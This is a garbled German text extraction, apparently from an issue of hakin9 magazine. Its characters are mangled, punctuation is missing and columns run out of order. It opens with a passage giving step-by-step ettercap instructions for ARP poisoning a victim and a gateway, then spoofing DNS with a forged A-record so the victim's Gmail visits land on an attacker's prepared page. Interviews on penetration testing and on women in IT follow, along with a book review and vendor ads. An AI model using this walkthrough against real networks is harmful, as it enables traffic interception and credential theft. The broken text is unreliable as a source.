eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
